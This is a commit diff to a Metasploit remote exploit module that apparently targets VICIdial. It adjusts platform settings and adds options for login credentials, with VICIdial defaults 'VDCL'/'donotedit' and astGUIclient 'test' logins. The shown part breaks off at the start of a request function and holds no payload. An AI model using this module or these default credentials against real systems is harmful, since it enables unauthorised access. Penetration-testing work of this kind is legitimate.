Add new options

bug/bundler_fix
jvazquez-r7 2013-11-06 15:53:12 -06:00
parent 110daa6e96
commit b9cb8e7930
1 changed files with 11 additions and 3 deletions

View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Oct 23 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Platform' => ['unix'],
'Payload' =>
{
'DisableNops' => true
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
]
],
'DefaultTarget' => 0
))
@ -57,10 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit']),
OptString.new('USER_ASTGUI', [true, 'astGUIcient User Login', 'test']),
OptString.new('PASS_ASTGUI', [true, 'astGUIcient User Password', 'test']),
OptString.new('PHONE_USER_ASTGUI', [true, 'astGUIcient Phone Login', 'test']),
OptString.new('PHONE_PASSWORD_ASTGUI', [true, 'astGUIcient Phone Password', 'test'])
], self.class)
end
def login
end
def request(cmd)
begin
res = send_request_cgi({